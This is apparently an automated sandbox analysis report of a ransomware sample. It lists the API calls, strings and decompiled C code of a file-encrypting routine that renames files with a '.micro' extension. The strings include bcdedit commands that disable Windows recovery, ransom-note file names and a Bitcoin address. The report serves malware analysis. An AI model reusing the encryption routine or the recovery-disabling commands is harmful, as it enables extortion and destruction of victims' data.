0x0041f4dd
0x00000000
0x0041f4df
0x0041f4e4
0x0041f4e5
0x0041f4e6
0x0041f4ee
0x0041f4f8
0x0041f4f8
0x0041f49c
0x0041f49e
0x0041f4a7
0x00000000
0x0041f504
0x0041f504
0x0041f511
0x0041f516
0x0041f522
0x0041f524
0x0041f52a
0x0041f52f
0x0041f556
0x0041f563
0x0041f56d
0x0041f573
0x0041f578
0x0041f58f
0x0041f597
0x0041f5a2
0x0041f5af
0x0041f5bc
0x0041f5c9
0x0041f5d6
0x0041f5de
0x0041f5e3
0x0041f5e8
0x0041f5ed
0x0041f5f3
0x0041f5f8
0x0041f5fd
0x0041f602
0x0041f607
0x0041f60c
0x0041f611
0x0041f616
0x0041f61b
0x0041f620
0x0041f635
0x0041f63d
0x0041f642
0x0041f647
0x0041f64c
0x0041f651
0x0041f656
0x0041f65b
0x0041f660
0x0041f665
0x0041f66a
0x0041f66f
0x0041f674
0x0041f679
0x0041f67e
0x0041f683
0x0041f688
0x0041f68e
0x0041f693
0x0041f698
0x0041f69d
0x0041f6a2
0x0041f6a7
0x0041f6ac
0x0041f6b1
0x0041f6b6
0x0041f6bb
0x0041f6d0
0x0041f6e4
0x0041f6ec
0x0041f6f1
0x0041f6f4
0x0041f6fb
0x0041f700
0x0041f700
0x0041f708
0x0041f708
0x0041f711
0x0041f717
0x0041f719
0x0041f71c
0x0041f71e
0x0041f721
0x0041f721
0x0041f72e
0x0041f73b
0x0041f740
0x0041f743
0x0041f745
0x0041f747
0x0041f751
0x0041f752
0x0041f75e
0x0041f75f
0x0041f764
0x0041f769
0x0041f76a
0x0041f76f
0x0041f773
0x0041f774
0x0041f779
0x0041f779
0x0041f77c
0x0041f781
0x0041f783
0x0041f789
0x0041f790
0x0041f796
0x0041f79b
0x0041f79e
0x0041f79e
0x0041f7a5
0x0041f7ab
0x0041f7b8
0x0041f7c0
0x0041f7c5
0x0041f7d3
0x0041f7de
0x0041f7e0
0x0041f7f0
0x0041f7f8
0x0041f817
0x0041f826
0x0041f833
0x0041f83b
0x0041f857
0x0041f863
0x0041f870
0x0041f88f
0x0041f89f
0x0041f8a4
0x0041f8af
0x0041f8bc
0x0041f8ca
0x0041f8d4
0x0041f8e8
0x0041f8ed
0x0041f8f0
0x00000000
0x0041f531
0x0041f533
0x0041f534
0x0041f535
0x0041f53d
0x0041f547
0x0041f547
0x0041f52f
0x0041f49e
0x0041f49a
0x0041f498
0x0041f48d
0x0041f277
0x0041f24d
0x0041f246
0x0041f248
0x00000000

APIs

AllocateAndInitializeSid.ADVAPI32 ref: 0041F09B
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0041F0B4
FreeSid.ADVAPI32(?), ref: 0041F0C7
SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\admin\AppData\Roaming), ref: 0041F0E6

Part of subcall function 004233D0: GetTickCount.KERNEL32(?,?,?,?,0041386B,00442000,00000003), ref: 004233E1
Part of subcall function 004233D0: Sleep.KERNELBASE(0000000F), ref: 00423417

CoCreateInstance.OLE32(0043B924,00000000,00000001,004312C8,?), ref: 0041F168
ExitProcess.KERNEL32 ref: 0041F188
CoCreateInstance.OLE32(0043B934,00000000,00000001,004312B8,?), ref: 0041F1A0
ExitProcess.KERNEL32 ref: 0041F1DE
LoadLibraryW.KERNEL32(Shell32.dll), ref: 0041F2F2
LoadStringW.USER32(00000000,00005509,Desktop,000000FF), ref: 0041F310
LoadStringW.USER32(00000000,00005527,Public Desktop,000000FF), ref: 0041F322
GetModuleHandleW.KERNEL32(KERNEL32), ref: 0041F329
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0041F33D
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 0041F34A
SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,C:\Windows), ref: 0041F35E
SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,C:\Program Files), ref: 0041F36D
SHGetFolderPathW.SHELL32(00000000,0000003B,00000000,00000000,C:\Users\admin\AppData\Local\Microsoft\Windows\Burn\Burn), ref: 0041F37C
SHGetSpecialFolderPathW.SHELL32(00000000,C:\Users\admin\Documents\recover_file_bmrurerhv.txt,00000005,00000000), ref: 0041F389
SHGetFolderPathW.SHELL32(00000000,00000010,00000000,00000000,C:\Users\admin\Desktop), ref: 0041F3E4
SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,C:\Users\Public\Desktop), ref: 0041F3F3
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,C:\ProgramData), ref: 0041F402
GetModuleFileNameW.KERNEL32(00000000,C:\Users\admin\AppData\Roaming\amhfnhe45.exe,00001000), ref: 0041F410
DeleteFileW.KERNELBASE(C:\Users\admin\AppData\Roaming\amhfnhe45.exe:Zone.Identifier), ref: 0041F449

Part of subcall function 00420160: CreateFileW.KERNEL32(C:\Users\admin\AppData\Roaming\amhfnhe45.exe,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00420184
Part of subcall function 00420160: SetFilePointer.KERNELBASE(00000000,0000003C,00000000,00000000,00000000,7600CD44), ref: 004201A0
Part of subcall function 00420160: ReadFile.KERNEL32(00000000,00000000,00000002,?,00000000), ref: 004201B5
Part of subcall function 00420160: SetFilePointer.KERNELBASE(00000000,-00000058,00000000,00000000), ref: 004201C4
Part of subcall function 00420160: ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004201D3
Part of subcall function 00420160: CloseHandle.KERNEL32(00000000), ref: 004201D6

LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 0041F468

Part of subcall function 0041F9D0: SetLastError.KERNEL32(00000057,76F85660,?,0041F488,?), ref: 0041F9EF
Part of subcall function 0041F9D0: GetCurrentProcess.KERNEL32(00000008,0041F488,00000000,76F85660,?,0041F488,?), ref: 0041FA03
Part of subcall function 0041F9D0: OpenProcessToken.ADVAPI32(00000000,?,0041F488,?), ref: 0041FA0A
Part of subcall function 0041F9D0: GetLastError.KERNEL32(?,0041F488,?), ref: 0041FA14
Part of subcall function 0041F9D0: GetTokenInformation.KERNELBASE(0041F488,00000019,00000000,00000000,?,7600CD44,?,0041F488,?), ref: 0041FA32
Part of subcall function 0041F9D0: GetLastError.KERNEL32(?,0041F488,?), ref: 0041FA3E
Part of subcall function 0041F9D0: GetLastError.KERNEL32(?,0041F488,?), ref: 0041FA45
Part of subcall function 0041F9D0: LocalAlloc.KERNEL32(00000040,?,?,0041F488,?), ref: 0041FA52
Part of subcall function 0041F9D0: GetLastError.KERNEL32(?,0041F488,?), ref: 0041FA5E
Part of subcall function 0041F9D0: GetTokenInformation.KERNELBASE(0041F488,00000019,00000000,?,?,?,0041F488,?), ref: 0041FA74
Part of subcall function 0041F9D0: GetLastError.KERNEL32(?,0041F488,?), ref: 0041FA7A
Part of subcall function 0041F9D0: GetSidSubAuthority.ADVAPI32(?,00000000,?,0041F488,?), ref: 0041FA86
Part of subcall function 0041F9D0: CloseHandle.KERNEL32(0041F488), ref: 0041FA9E
Part of subcall function 0041F9D0: LocalFree.KERNEL32 ref: 0041FAAC
Part of subcall function 0041F9D0: SetLastError.KERNEL32(?,?,0041F488,?), ref: 0041FABF

Part of subcall function 0041E880: GetEnvironmentVariableW.KERNEL32(windir,?,00000208), ref: 0041E8E2
Part of subcall function 0041E880: ShellExecuteExW.SHELL32(?), ref: 0041E9C6
Part of subcall function 0041E880: GetLastError.KERNEL32 ref: 0041E9E0
Part of subcall function 0041E880: Sleep.KERNEL32(000003E8), ref: 0041E9EE
Part of subcall function 0041E880: ShellExecuteExW.SHELL32(0000003C), ref: 0041E9F7
Part of subcall function 0041E880: CloseHandle.KERNEL32(?), ref: 0041EA06

Part of subcall function 004201F0: GetCurrentProcess.KERNEL32(00020028,?,?,?,?,?,?,0041F47E), ref: 0042020B
Part of subcall function 004201F0: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,0041F47E), ref: 00420212
Part of subcall function 004201F0: AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000000,00000000,00000000), ref: 00420253
Part of subcall function 004201F0: CloseHandle.KERNEL32(?), ref: 0042025D

Part of subcall function 0041FAE0: PathFindFileNameW.SHLWAPI(C:\Users\admin\AppData\Roaming\amhfnhe45.exe), ref: 0041FB29
Part of subcall function 0041FAE0: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0041FB64
Part of subcall function 0041FAE0: GetLastError.KERNEL32(?,?,?,?,?,00000000,76F85660,?,0041F500), ref: 0041FB6C
Part of subcall function 0041FAE0: CloseHandle.KERNEL32(00000000), ref: 0041FB75
Part of subcall function 0041FAE0: CopyFileW.KERNEL32(C:\Users\admin\AppData\Roaming\amhfnhe45.exe,?,00000000), ref: 0041FBC0
Part of subcall function 0041FAE0: CreateProcessW.KERNEL32 ref: 0041FC14

CreateMutexW.KERNELBASE(00000000,00000000,12393578327533451), ref: 0041F522
GetLastError.KERNEL32 ref: 0041F524
GetVersionExW.KERNEL32(00441738), ref: 0041F56D

Part of subcall function 0041FD80: RegCreateKeyExA.KERNEL32 ref: 0041FDE1
Part of subcall function 0041FD80: RegSetValueExW.KERNEL32(?,EnableLinkedConnections,00000000,00000004,00000001,00000004), ref: 0041FE00
Part of subcall function 0041FD80: RegFlushKey.ADVAPI32(?), ref: 0041FE0D
Part of subcall function 0041FD80: RegCloseKey.ADVAPI32(?), ref: 0041FE1A

CreateThread.KERNEL32 ref: 0041F597

Part of subcall function 0041EF90: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0041EFFA
Part of subcall function 0041EF90: WaitForSingleObject.KERNEL32(?,00007530), ref: 0041F005
Part of subcall function 0041EF90: CloseHandle.KERNEL32(?), ref: 0041F015
Part of subcall function 0041EF90: CloseHandle.KERNEL32(?), ref: 0041F01B
Part of subcall function 0041EF90: Sleep.KERNELBASE(000003E8), ref: 0041F022

Part of subcall function 00420700: CreateThread.KERNEL32(00000000,00000000,0041F7B0,00000000,00000000,00000000,?,0041F7B0,Function_0001FF20,?,?,?,?,00000000,000001DF,004665A8), ref: 00420724

SetThreadPriority.KERNEL32(00000000,000000F1,?,?,?,?,?,?,00000000,000001DF,004665A8,00000000,AA6A331C729CA1F,AA6A331C729CA1F,AA6A331C729CA1F,AA6A331C729CA1F), ref: 0041F7C5

Part of subcall function 0041F910: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0041F931
Part of subcall function 0041F910: WriteFile.KERNEL32(00000000,00462918,00462919,00000000,00000000), ref: 0041F95C
Part of subcall function 0041F910: CloseHandle.KERNEL32(00000000), ref: 0041F963

Part of subcall function 0041F970: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0041F991
Part of subcall function 0041F970: WriteFile.KERNEL32(00000000,004665A8,004665A9,00000000,00000000), ref: 0041F9BC
Part of subcall function 0041F970: CloseHandle.KERNEL32(00000000), ref: 0041F9C3

Part of subcall function 00420350: GetDC.USER32(00000000), ref: 004203EB
Part of subcall function 00420350: GetDIBits.GDI32(00000000,?,00000000,?,00000000,?,00000000), ref: 0042041C
Part of subcall function 00420350: ReleaseDC.USER32(00000000,00000000), ref: 00420425
Part of subcall function 00420350: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0042045E
Part of subcall function 00420350: WriteFile.KERNEL32(00000000,?,0000000E,00000000,00000000), ref: 00420478
Part of subcall function 00420350: WriteFile.KERNEL32(00000000,00000028,00000028,00000000,00000000), ref: 00420492
Part of subcall function 00420350: WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 004204A8
Part of subcall function 00420350: FlushFileBuffers.KERNEL32(00000000), ref: 004204AF
Part of subcall function 00420350: CloseHandle.KERNEL32(00000000), ref: 004204B6
Part of subcall function 00420350: DeleteObject.GDI32(?), ref: 004204C9

Part of subcall function 0041FC50: GetShortPathNameW.KERNEL32(?,?,00001000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041FCA1

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

C:\Users\admin\AppData\Roaming\amhfnhe45.exe, xrefs: 0041F409, 0041F416
bcdedit.exe /set {current} advancedoptions off, xrefs: 0041F5AA
C:\ProgramData, xrefs: 0041F3F5
bcdedit.exe /set {current} recoveryenabled off, xrefs: 0041F5D1
Public Desktop, xrefs: 0041F317
bcdedit.exe /set {current} bootems off, xrefs: 0041F59D
bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures, xrefs: 0041F5C4
%s\help_recover_instructions.TXT, xrefs: 0041F80C
C:\Users\admin\Desktop, xrefs: 0041F3D7, 0041F800, 0041F840, 0041F878
C:\Users\admin\AppData\Roaming, xrefs: 0041F0D7
C:\Users\Public\Desktop, xrefs: 0041F3E6
%s\help_recover_instructions.BMP, xrefs: 0041F884
C:\Users\admin\Documents\recover_file_bmrurerhv.txt, xrefs: 0041F382, 0041F399, 0041F3B3, 0041F3CA, 0041F735
Shell32.dll, xrefs: 0041F2ED
bcdedit.exe /set {current} optionsedit off, xrefs: 0041F5B7
Wow64RevertWow64FsRedirection, xrefs: 0041F33F
C:\Windows, xrefs: 0041F34C
AA6A331C729CA1F, xrefs: 0041F5E3, 0041F5E8, 0041F5F3, 0041F5F8, 0041F5FD, 0041F602, 0041F607, 0041F60C, 0041F611, 0041F616, 0041F61B, 0041F620, 0041F625, 0041F63D, 0041F642, 0041F647, 0041F64C, 0041F651, 0041F656, 0041F65B, 0041F660, 0041F665, 0041F66A, 0041F66F, 0041F674, 0041F679, 0041F67E, 0041F683, 0041F68E, 0041F693, 0041F698, 0041F69D, 0041F6A2, 0041F6A7, 0041F6AC, 0041F6B1, 0041F6B6, 0041F6BB, 0041F6C0, 0041F752
C:\Users\admin\AppData\Local\Microsoft\Windows\Burn\Burn, xrefs: 0041F36F
C:\Program Files, xrefs: 0041F360
%s%s%S%d, xrefs: 0041F764
Desktop, xrefs: 0041F303
12393578327533451, xrefs: 0041F519
\recover_file_, xrefs: 0041F38F
149GjgCKkimJLKjmzZumc1Hg6bpdDihTSg, xrefs: 0041F75F
SeDebugPrivilege, xrefs: 0041F45C
.HTM, xrefs: 0041F83B
.txt, xrefs: 0041F3C0
:Zone.Identifier, xrefs: 0041F42D
Wow64DisableWow64FsRedirection, xrefs: 0041F337
C:\Users\admin\AppData\Roaming\amhfnhe45.exe:Zone.Identifier, xrefs: 0041F420, 0041F437, 0041F444
%s\help_recover_instructions%s, xrefs: 0041F84C
KERNEL32, xrefs: 0041F324

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 00413E50, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 340

C-Code - Quality: 90%

			E00413E50(WCHAR* __ecx) {
				signed int _v8;
				char _v9;
				short _v11;
				intOrPtr _v12;
				short _v15;
				intOrPtr _v16;
				short _v19;
				intOrPtr _v20;
				short _v23;
				char _v24;
				char _v25;
				short _v27;
				short _v31;
				short _v35;
				short _v39;
				short _v43;
				short _v47;
				short _v51;
				short _v55;
				char _v56;
				char _v8250;
				short _v8252;
				char _v8500;
				long _v8504;
				short _v8508;
				short _v8512;
				short _v8516;
				void _v8520;
				void* _v8524;
				long _v8528;
				long _v8532;
				WCHAR* _v8536;
				intOrPtr _v8540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t80;
				signed int _t90;
				long _t91;
				void* _t92;
				int _t94;
				void* _t98;
				char _t100;
				intOrPtr _t101;
				int _t108;
				int _t110;
				int _t117;
				int _t126;
				void* _t142;
				void* _t152;
				intOrPtr _t153;
				intOrPtr _t154;
				intOrPtr _t172;
				intOrPtr _t173;
				void* _t179;
				void* _t180;
				void* _t181;
				signed int _t182;

				E0042E220(0x215c);
				_t80 =  *0x43f054; // 0xd6baf341
				_v8 = _t80 ^ _t182;
				_t179 = __ecx;
				_v8536 = __ecx;
				_v8520 = 0;
				_v8516 = 0;
				_v8512 = 0;
				_v8508 = 0;
				_v8504 = 0;
				_v56 = 0;
				_v55 = 0;
				_v51 = 0;
				_v47 = 0;
				_v43 = 0;
				_v39 = 0;
				_v35 = 0;
				_v31 = 0;
				_v27 = 0;
				_v25 = 0;
				_v24 = 0;
				_v23 = 0;
				_v19 = 0;
				_v15 = 0;
				_v11 = 0;
				_v9 = 0;
				_v8528 = 0;
				_v8252 = 0;
				E0042D0A0( &_v8250, 0, 0x1ffe);
				_t170 =  &_v8252;
				E00425E37( &_v8252, 0x1000, _t179, 0xffffffff);
				E00426165( &_v8252, 0x1000, L".micro", 0xffffffff);
				_t181 = GetProcessHeap();
				if(_t181 == 0) {
					L17:
					return E004256FE(_t87 | 0xffffffff, _t142, _v8 ^ _t182, _t170, _t179, _t181);
				} else {
					_t87 = GetFileAttributesW(_t179);
					if(_t87 == 0xffffffff) {
						goto L17;
					} else {
						if((_t87 & 0x00000001) != 0) {
							SetFileAttributesW(_t179, _t87 & 0xfffffffe);
						}
						_t87 = CreateFileW(_t179, 0xc0000000, 0, 0, 3, 0x80, 0); // executed
						_t179 = _t87;
						if(_t179 == 0xffffffff) {
							goto L17;
						} else {
							_t90 = GetFileSize(_t179, 0);
							_v8524 = _t90;
							if(_t90 == 0xffffffff || _t90 == 0 || _t90 < 0x20 || _t90 > 0x13800000) {
								L16:
								_t87 = CloseHandle(_t179);
								goto L17;
							} else {
								_t170 = _t90 & 0x0000000f;
								_t91 = _t90 + 0x10;
								_v8540 = 0x10 - (_t90 & 0x0000000f);
								_v8532 = _t91;
								_t92 = HeapAlloc(_t181, 0, _t91); // executed
								_t142 = _t92;
								if(_t142 == 0) {
									goto L16;
								} else {
									_t94 = ReadFile(_t179, _t142, _v8524,  &_v8504, 0); // executed
									if(_t94 != 0) {
										if( *_t142 != 0) {
											_t152 = _v8524;
											if(_t152 == _v8504) {
												_t170 = _t142 + _t152;
												E0042D0A0(_t142 + _t152, _v8540, _v8540);
												_t98 = HeapAlloc(_t181, 0, _v8532); // executed
												_v8524 = _t98;
												if(_t98 == 0) {
													goto L15;
												} else {
													_t100 =  *0x433cb4; // 0xbf0a5127
													_t153 =  *0x433cb8; // 0x26698d31
													_t172 =  *0x433cbc; // 0x2b977817
													_v8520 = _t100;
													_v24 = _t100;
													_t101 =  *0x433cbc; // 0x2b977817
													_v8516 = _t153;
													_v20 = _t153;
													_t154 =  *0x441d18; // 0x203ea08
													_v8512 = _t172;
													_t173 =  *0x433cc0; // 0x9ff67d98
													_v16 = _t101;
													_v8508 = _t173;
													_v12 = _t173;
													E0040D9C0( &_v56, _t154, _t154);
													_push( &_v8500);
													_push( &_v56);
													E00424040();
													_push( &_v8500);
													_push( &_v24);
													_t176 = _v8524;
													_push(_t142);
													if(E0041BC70(_v8532, _v8524) != 1) {
														SetFilePointer(_t179, 0, 0, 0); // executed
														_v8528 = 0;
														_t108 = WriteFile(_t179, 0x441e58, 0x15c,  &_v8528, 0); // executed
														if(_t108 != 0) {
															_v8528 = 0;
															_t110 = WriteFile(_t179,  &_v8520, 0x14,  &_v8528, 0); // executed
															if(_t110 == 0) {
																goto L22;
															} else {
																_t176 = _v8524;
																_v8528 = 0;
																_t117 = WriteFile(_t179, _v8524, _v8532,  &_v8528, 0); // executed
																if(_t117 == 0) {
																	goto L20;
																} else {
																	FlushFileBuffers(_t179);
																	CloseHandle(_t179);
																	_t180 = 0;
																	while(1) {
																		_t126 = MoveFileExW(_v8536,  &_v8252, 8); // executed
																		if(_t126 != 0) {
																			break;
																		}
																		if(GetLastError() == 0xb7) {
																			DeleteFileW( &_v8252);
																		}
																		Sleep(0x190); // executed
																		_t180 = _t180 + 1;
																		if(_t180 < 4) {
																			continue;
																		}
																		break;
																	}
																	 *0x441ff8 =  *0x441ff8 + _v8532;
																	_t179 = HeapFree;
																	asm("adc dword [0x441ffc], 0x0");
																	HeapFree(_t181, 0, _t142);
																	_t170 = _v8524;
																	HeapFree(_t181, 0, _v8524); // executed
																	goto L31;
																}
															}
														} else {
															L22:
															HeapFree(_t181, 0, _t142);
															HeapFree(_t181, 0, _v8524);
															return E004256FE(CloseHandle(_t179) | 0xffffffff, HeapFree, _v8 ^ _t182, _v8524, _t179, _t181);
														}
													} else {
														L20:
														HeapFree(_t181, 0, _t142);
														HeapFree(_t181, 0, _v8524);
														return E004256FE(CloseHandle(_t179) | 0xffffffff, HeapFree, _v8 ^ _t182, _t176, _t179, _t181);
													}
												}
											} else {
												L15:
												HeapFree(_t181, 0, _t142);
												goto L16;
											}
										} else {
											CloseHandle(_t179);
											HeapFree(_t181, 0, _t142);
											L31:
											return E004256FE(1, _t142, _v8 ^ _t182, _t170, _t179, _t181);
										}
									} else {
										CloseHandle(_t179);
										return E004256FE(HeapFree(_t181, 0, _t142) | 0xffffffff, _t142, _v8 ^ _t182, _t170, _t179, _t181);
									}
								}
							}
						}
					}
				}
			}

0x00413e5a
0x00413e5f
0x00413e66
0x00413e6e
0x00413e7d
0x00413e83
0x00413e89
0x00413e8f
0x00413e95
0x00413e9b
0x00413ea1
0x00413ea4
0x00413ea7
0x00413eaa
0x00413ead
0x00413eb0
0x00413eb3
0x00413eb6
0x00413eb9
0x00413ebd
0x00413ec0
0x00413ec3
0x00413ec6
0x00413ec9
0x00413ecc
0x00413ed0
0x00413ed3
0x00413ed9
0x00413ee0
0x00413eeb
0x00413ef7
0x00413f0f
0x00413f1d
0x00413f21
0x00414043
0x00414056
0x00413f27
0x00413f28
0x00413f31
0x00000000
0x00413f37
0x00413f39
0x00413f40
0x00413f40
0x00413f59
0x00413f5f
0x00413f64
0x00000000
0x00413f6a
0x00413f6d
0x00413f73
0x00413f7c
0x0041403c
0x0041403d
0x00000000
0x00413f9e
0x00413fa0
0x00413faa
0x00413fb0
0x00413fb6
0x00413fbc
0x00413fc2
0x00413fc6
0x00000000
0x00413fc8
0x00413fda
0x00413fe2
0x0041400c
0x00414024
0x00414030
0x0041405f
0x00414063
0x00414075
0x0041407b
0x00414083
0x00000000
0x00414085
0x00414085
0x0041408a
0x00414090
0x00414096
0x0041409c
0x0041409f
0x004140a4
0x004140aa
0x004140ad
0x004140b3
0x004140b9
0x004140bf
0x004140c6
0x004140cc
0x004140cf
0x004140dd
0x004140e1
0x004140e2
0x004140ed
0x004140f7
0x004140f8
0x004140fe
0x0041410a
0x00414146
0x00414160
0x0041416a
0x00414172
0x004141ba
0x004141c4
0x004141cc
0x00000000
0x004141ce
0x004141d4
0x004141e6
0x004141f0
0x004141f8
0x00000000
0x004141fe
0x004141ff
0x00414206
0x0041420c
0x00414210
0x00414220
0x00414228
0x00000000
0x00000000
0x00414235
0x0041423e
0x0041423e
0x00414249
0x0041424f
0x00414253
0x00000000
0x00000000
0x00000000
0x00414253
0x0041425b
0x00414261
0x00414268
0x00414272
0x00414274
0x0041427e
0x00000000
0x0041427e
0x004141f8
0x00414174
0x00414174
0x0041417e
0x0041418a
0x004141a6
0x004141a6
0x0041410c
0x0041410c
0x00414116
0x00414122
0x0041413e
0x0041413e
0x0041410a
0x00414032
0x00414032
0x00414036
0x00000000
0x00414036
0x0041400e
0x0041400f
0x00414019
0x00414280
0x00414295
0x00414295
0x00413fe4
0x00413fe5
0x00414008
0x00414008
0x00413fe2
0x00413fc6
0x00413f7c
0x00413f64
0x00413f31

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00413E04), ref: 00413F17
GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,00413E04), ref: 00413F28
SetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,00000001,?,00413E04), ref: 00413F40
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00413F59
GetFileSize.KERNEL32(00000000,00000000,?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00413F6D
HeapAlloc.KERNEL32(00000000,00000000,00000000,?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00413FBC
ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00413FDA
CloseHandle.KERNEL32(00000000), ref: 00413FE5
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00413FEF
CloseHandle.KERNEL32(00000000), ref: 0041400F
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00414019
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00414036

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

HeapAlloc.KERNEL32(00000000,00000000,?,00000080,00000000,?,?,?,?,?,?,?,?,?,00000001), ref: 00414075
CloseHandle.KERNEL32(00000000), ref: 0041403D

Part of subcall function 0040D9C0: _aullshr.NTDLL ref: 0040DA3D

HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00414116
HeapFree.KERNEL32(00000000,00000000,?), ref: 00414122
CloseHandle.KERNEL32(00000000), ref: 00414125
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00414146
WriteFile.KERNEL32 ref: 0041416A
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0041417E
HeapFree.KERNEL32(00000000,00000000,?), ref: 0041418A
CloseHandle.KERNEL32(00000000), ref: 0041418D
WriteFile.KERNEL32(00000000,?,00000014,00000000,00000000), ref: 004141C4
WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 004141F0
FlushFileBuffers.KERNEL32(00000000), ref: 004141FF
CloseHandle.KERNEL32(00000000), ref: 00414206
MoveFileExW.KERNEL32(?,?,00000008), ref: 00414220
GetLastError.KERNEL32 ref: 0041422A
DeleteFileW.KERNEL32(?), ref: 0041423E
Sleep.KERNELBASE(00000190), ref: 00414249
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00414272
HeapFree.KERNEL32(00000000,00000000,?), ref: 0041427E

Strings

.micro, xrefs: 00413EFE

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0041B480, Relevance: 45.9, APIs: 13, Strings: 13, Instructions: 392

C-Code - Quality: 80%

			E0041B480(intOrPtr _a4, char _a12, long _a20, intOrPtr _a28, intOrPtr _a32, long _a48, char _a260, intOrPtr _a264, intOrPtr _a268, intOrPtr _a272, char _a276, char _a292, intOrPtr _a293, intOrPtr _a297, intOrPtr _a301, intOrPtr _a305, intOrPtr _a309, intOrPtr _a313, intOrPtr _a317, short _a321, char _a323, char _a324, char _a344, char* _a345, char* _a349, char* _a353, char _a356, short _a357, char _a372, char _a373, char _a548, char _a612, char _a628, char _a629, void _a1028, char _a1092, char _a1124, char _a1160, char _a1161, char _a5104, char _a5124, char _a5125, char _a8284, char _a8285, signed int _a12452) {
				void* _v0;
				char** _v8;
				void* _v20;
				char** _v24;
				void* _v36;
				intOrPtr _v64;
				void* _v68;
				char* _v116;
				intOrPtr _v124;
				void* _v136;
				char** _v148;
				void* _v156;
				signed int _t100;
				char* _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr _t107;
				intOrPtr* _t108;
				void* _t112;
				char* _t117;
				intOrPtr _t130;
				intOrPtr* _t136;
				intOrPtr* _t140;
				void* _t154;
				intOrPtr* _t158;
				long _t159;
				void* _t168;
				char* _t169;
				intOrPtr _t178;
				intOrPtr _t179;
				intOrPtr _t180;
				char _t182;
				intOrPtr _t188;
				intOrPtr _t189;
				intOrPtr _t190;
				intOrPtr _t191;
				intOrPtr _t194;
				void* _t200;
				intOrPtr* _t201;
				intOrPtr _t208;
				char* _t211;
				intOrPtr _t215;
				intOrPtr _t228;
				intOrPtr _t230;
				char** _t238;
				void* _t239;
				long _t245;
				char* _t246;
				intOrPtr* _t247;
				void* _t248;
				void* _t250;
				signed int _t251;
				signed int _t252;
				void* _t253;
				void* _t254;
				void* _t260;
				void* _t262;
				void* _t267;
				void* _t269;
				intOrPtr _t287;

				_t252 = _t251 & 0xfffffff8;
				E0042E220(0x30ac);
				_t100 =  *0x43f054; // 0xd6baf341
				_a12452 = _t100 ^ _t252;
				_t102 =  *0x44185c; // 0x2064810
				_t178 =  *0x441b58; // 0x2064918
				_t208 =  *0x441858; // 0x2064a20
				 *0x48224c = _t102;
				_t103 =  *0x441b5c; // 0x2064b28
				 *0x482250 = _t178;
				_t179 =  *0x441854; // 0x2064d38
				 *0x482258 = _t103;
				_t104 =  *0x441b64; // 0x2064c30
				 *0x482254 = _t208;
				 *0x48225c = _t104;
				 *0x482260 = _t179;
				 *0x482264 = _t104;
				 *0x482268 = _t179;
				E0040D8C0(E0040D580(), _t208, 0x441d88, 0x61);
				_a344 = 0;
				_a345 = 0;
				_a349 = 0;
				_a353 = 0;
				_a357 = 0;
				_t107 = E00411370(_t105);
